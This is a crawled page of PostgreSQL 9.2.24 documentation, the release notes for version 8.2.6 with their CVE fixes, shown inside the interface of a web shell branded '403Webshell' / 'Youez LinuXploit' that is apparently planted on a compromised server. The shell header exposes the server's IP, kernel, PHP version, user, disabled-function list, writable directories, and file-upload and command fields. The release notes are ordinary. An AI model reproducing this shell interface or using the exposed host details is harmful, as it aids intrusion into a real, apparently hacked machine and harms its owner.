403Webshell
Server IP : 103.119.228.120  /  Your IP : 3.145.68.167
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /usr/local/ssl/local/ssl/local/ssl/share/doc/postgresql-9.2.24/html/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/local/ssl/local/ssl/local/ssl/share/doc/postgresql-9.2.24/html/release-8-2-6.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML
><HEAD
><TITLE
>Release 8.2.6</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.79"><LINK
REV="MADE"
HREF="mailto:pgsql-docs@postgresql.org"><LINK
REL="HOME"
TITLE="PostgreSQL 9.2.24 Documentation"
HREF="index.html"><LINK
REL="UP"
TITLE="Release Notes"
HREF="release.html"><LINK
REL="PREVIOUS"
TITLE="Release 8.2.7"
HREF="release-8-2-7.html"><LINK
REL="NEXT"
TITLE="Release 8.2.5"
HREF="release-8-2-5.html"><LINK
REL="STYLESHEET"
TYPE="text/css"
HREF="stylesheet.css"><META
HTTP-EQUIV="Content-Type"
CONTENT="text/html; charset=ISO-8859-1"><META
NAME="creation"
CONTENT="2017-11-06T22:43:11"></HEAD
><BODY
CLASS="SECT1"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="5"
ALIGN="center"
VALIGN="bottom"
><A
HREF="index.html"
>PostgreSQL 9.2.24 Documentation</A
></TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="top"
><A
TITLE="Release 8.2.7"
HREF="release-8-2-7.html"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="top"
><A
HREF="release.html"
ACCESSKEY="U"
>Up</A
></TD
><TD
WIDTH="60%"
ALIGN="center"
VALIGN="bottom"
>Appendix E. Release Notes</TD
><TD
WIDTH="20%"
ALIGN="right"
VALIGN="top"
><A
TITLE="Release 8.2.5"
HREF="release-8-2-5.html"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"></DIV
><DIV
CLASS="SECT1"
><H1
CLASS="SECT1"
><A
NAME="RELEASE-8-2-6"
>E.139. Release 8.2.6</A
></H1
><DIV
CLASS="FORMALPARA"
><P
><B
>Release date: </B
>2008-01-07</P
></DIV
><P
>   This release contains a variety of fixes from 8.2.5,
   including fixes for significant security issues.
   For information about new features in the 8.2 major release, see
   <A
HREF="release-8-2.html"
>Section E.145</A
>.
  </P
><DIV
CLASS="SECT2"
><H2
CLASS="SECT2"
><A
NAME="AEN133844"
>E.139.1. Migration to Version 8.2.6</A
></H2
><P
>    A dump/restore is not required for those running 8.2.X.
   </P
></DIV
><DIV
CLASS="SECT2"
><H2
CLASS="SECT2"
><A
NAME="AEN133847"
>E.139.2. Changes</A
></H2
><P
></P
><UL
><LI
><P
>      Prevent functions in indexes from executing with the privileges of
      the user running <TT
CLASS="COMMAND"
>VACUUM</TT
>, <TT
CLASS="COMMAND"
>ANALYZE</TT
>, etc (Tom)
     </P
><P
>      Functions used in index expressions and partial-index
      predicates are evaluated whenever a new table entry is made.  It has
      long been understood that this poses a risk of trojan-horse code
      execution if one modifies a table owned by an untrustworthy user.
      (Note that triggers, defaults, check constraints, etc. pose the
      same type of risk.)  But functions in indexes pose extra danger
      because they will be executed by routine maintenance operations
      such as <TT
CLASS="COMMAND"
>VACUUM FULL</TT
>, which are commonly performed
      automatically under a superuser account.  For example, a nefarious user
      can execute code with superuser privileges by setting up a
      trojan-horse index definition and waiting for the next routine vacuum.
      The fix arranges for standard maintenance operations
      (including <TT
CLASS="COMMAND"
>VACUUM</TT
>, <TT
CLASS="COMMAND"
>ANALYZE</TT
>, <TT
CLASS="COMMAND"
>REINDEX</TT
>,
      and <TT
CLASS="COMMAND"
>CLUSTER</TT
>) to execute as the table owner rather than
      the calling user, using the same privilege-switching mechanism already
      used for <TT
CLASS="LITERAL"
>SECURITY DEFINER</TT
> functions.  To prevent bypassing
      this security measure, execution of <TT
CLASS="COMMAND"
>SET SESSION
      AUTHORIZATION</TT
> and <TT
CLASS="COMMAND"
>SET ROLE</TT
> is now forbidden within a
      <TT
CLASS="LITERAL"
>SECURITY DEFINER</TT
> context.  (CVE-2007-6600)
     </P
></LI
><LI
><P
>      Repair assorted bugs in the regular-expression package (Tom, Will Drewry)
     </P
><P
>      Suitably crafted regular-expression patterns could cause crashes,
      infinite or near-infinite looping, and/or massive memory consumption,
      all of which pose denial-of-service hazards for applications that
      accept regex search patterns from untrustworthy sources.
      (CVE-2007-4769, CVE-2007-4772, CVE-2007-6067)
     </P
></LI
><LI
><P
>      Require non-superusers who use <TT
CLASS="FILENAME"
>/contrib/dblink</TT
> to use only
      password authentication, as a security measure (Joe)
     </P
><P
>      The fix that appeared for this in 8.2.5 was incomplete, as it plugged
      the hole for only some <TT
CLASS="FILENAME"
>dblink</TT
> functions.  (CVE-2007-6601,
      CVE-2007-3278)
     </P
></LI
><LI
><P
>      Fix bugs in WAL replay for GIN indexes (Teodor)
     </P
></LI
><LI
><P
>      Fix GIN index build to work properly when
      <TT
CLASS="VARNAME"
>maintenance_work_mem</TT
> is 4GB or more (Tom)
     </P
></LI
><LI
><P
>      Update time zone data files to <SPAN
CLASS="APPLICATION"
>tzdata</SPAN
> release 2007k
      (in particular, recent Argentina changes) (Tom)
     </P
></LI
><LI
><P
>      Improve planner's handling of LIKE/regex estimation in non-C locales
      (Tom)
     </P
></LI
><LI
><P
>      Fix planning-speed problem for deep outer-join nests, as well as
      possible poor choice of join order (Tom)
     </P
></LI
><LI
><P
>      Fix planner failure in some cases of <TT
CLASS="LITERAL"
>WHERE false AND var IN
      (SELECT ...)</TT
> (Tom)
     </P
></LI
><LI
><P
>      Make <TT
CLASS="COMMAND"
>CREATE TABLE ... SERIAL</TT
> and
      <TT
CLASS="COMMAND"
>ALTER SEQUENCE ... OWNED BY</TT
> not change the
      <CODE
CLASS="FUNCTION"
>currval()</CODE
> state of the sequence (Tom)
     </P
></LI
><LI
><P
>      Preserve the tablespace and storage parameters of indexes that are
      rebuilt by <TT
CLASS="COMMAND"
>ALTER TABLE ... ALTER COLUMN TYPE</TT
> (Tom)
     </P
></LI
><LI
><P
>      Make archive recovery always start a new WAL timeline, rather than only
      when a recovery stop time was used (Simon)
     </P
><P
>      This avoids a corner-case risk of trying to overwrite an existing
      archived copy of the last WAL segment, and seems simpler and cleaner
      than the original definition.
     </P
></LI
><LI
><P
>      Make <TT
CLASS="COMMAND"
>VACUUM</TT
> not use all of <TT
CLASS="VARNAME"
>maintenance_work_mem</TT
>
      when the table is too small for it to be useful (Alvaro)
     </P
></LI
><LI
><P
>      Fix potential crash in <CODE
CLASS="FUNCTION"
>translate()</CODE
> when using a multibyte
      database encoding (Tom)
     </P
></LI
><LI
><P
>      Make <CODE
CLASS="FUNCTION"
>corr()</CODE
> return the correct result for negative
      correlation values (Neil)
     </P
></LI
><LI
><P
>      Fix overflow in <TT
CLASS="LITERAL"
>extract(epoch from interval)</TT
> for intervals
      exceeding 68 years (Tom)
     </P
></LI
><LI
><P
>      Fix PL/Perl to not fail when a UTF-8 regular expression is used
      in a trusted function (Andrew)
     </P
></LI
><LI
><P
>      Fix PL/Perl to cope when platform's Perl defines type <TT
CLASS="LITERAL"
>bool</TT
>
      as <TT
CLASS="LITERAL"
>int</TT
> rather than <TT
CLASS="LITERAL"
>char</TT
> (Tom)
     </P
><P
>      While this could theoretically happen anywhere, no standard build of
      Perl did things this way ... until <SPAN
CLASS="PRODUCTNAME"
>Mac OS X</SPAN
> 10.5.
     </P
></LI
><LI
><P
>      Fix PL/Python to work correctly with Python 2.5 on 64-bit machines
      (Marko Kreen)
     </P
></LI
><LI
><P
>      Fix PL/Python to not crash on long exception messages (Alvaro)
     </P
></LI
><LI
><P
>      Fix <SPAN
CLASS="APPLICATION"
>pg_dump</SPAN
> to correctly handle inheritance child tables
      that have default expressions different from their parent's (Tom)
     </P
></LI
><LI
><P
>      Fix <SPAN
CLASS="APPLICATION"
>libpq</SPAN
> crash when <TT
CLASS="VARNAME"
>PGPASSFILE</TT
> refers
      to a file that is not a plain file (Martin Pitt)
     </P
></LI
><LI
><P
>      <SPAN
CLASS="APPLICATION"
>ecpg</SPAN
> parser fixes (Michael)
     </P
></LI
><LI
><P
>      Make <TT
CLASS="FILENAME"
>contrib/pgcrypto</TT
> defend against
      <SPAN
CLASS="APPLICATION"
>OpenSSL</SPAN
> libraries that fail on keys longer than 128
      bits; which is the case at least on some Solaris versions (Marko Kreen)
     </P
></LI
><LI
><P
>      Make <TT
CLASS="FILENAME"
>contrib/tablefunc</TT
>'s <CODE
CLASS="FUNCTION"
>crosstab()</CODE
> handle
      NULL rowid as a category in its own right, rather than crashing (Joe)
     </P
></LI
><LI
><P
>      Fix <TT
CLASS="TYPE"
>tsvector</TT
> and <TT
CLASS="TYPE"
>tsquery</TT
> output routines to
      escape backslashes correctly (Teodor, Bruce)
     </P
></LI
><LI
><P
>      Fix crash of <CODE
CLASS="FUNCTION"
>to_tsvector()</CODE
> on huge input strings (Teodor)
     </P
></LI
><LI
><P
>      Require a specific version of <SPAN
CLASS="PRODUCTNAME"
>Autoconf</SPAN
> to be used
      when re-generating the <TT
CLASS="COMMAND"
>configure</TT
> script (Peter)
     </P
><P
>      This affects developers and packagers only.  The change was made
      to prevent accidental use of untested combinations of
      <SPAN
CLASS="PRODUCTNAME"
>Autoconf</SPAN
> and <SPAN
CLASS="PRODUCTNAME"
>PostgreSQL</SPAN
> versions.
      You can remove the version check if you really want to use a
      different <SPAN
CLASS="PRODUCTNAME"
>Autoconf</SPAN
> version, but it's
      your responsibility whether the result works or not.
     </P
></LI
><LI
><P
>      Update <CODE
CLASS="FUNCTION"
>gettimeofday</CODE
> configuration check so that
      <SPAN
CLASS="PRODUCTNAME"
>PostgreSQL</SPAN
> can be built on newer versions of
      <SPAN
CLASS="PRODUCTNAME"
>MinGW</SPAN
> (Magnus)
     </P
></LI
></UL
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="release-8-2-7.html"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="index.html"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="release-8-2-5.html"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>Release 8.2.7</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="release.html"
ACCESSKEY="U"
>Up</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>Release 8.2.5</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

Youez - 2016 - github.com/yon3zu
LinuXploit